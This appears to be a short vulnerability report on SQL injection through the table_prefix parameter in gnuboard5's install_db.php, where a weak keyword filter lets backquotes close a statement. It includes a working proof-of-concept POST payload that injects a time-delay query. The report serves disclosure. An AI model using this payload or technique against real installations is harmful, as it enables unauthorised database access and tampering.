parameter `$table_prefix` input from POST in install_db.php line 25
```
$table_prefix= safe_install_string_check($_POST['table_prefix']);
```
`$table_prefix` only be filtered by function `safe_install_string_check`. but function `safe_install_string_check` filter data without evil keyword which will lead to sql injection.
parameter `$table_prefix` will be inject into sql from gnuboard5.sql, we can use backquotes to close last sql. and inject a new sql to do anythings.
payload
```
mysql_host=localhost&mysql_user=root&mysql_pass=&mysql_db=g5&table_prefix=123`; select sleep(5)#
```
and then will sleep 5 secords.
Unavailable Comments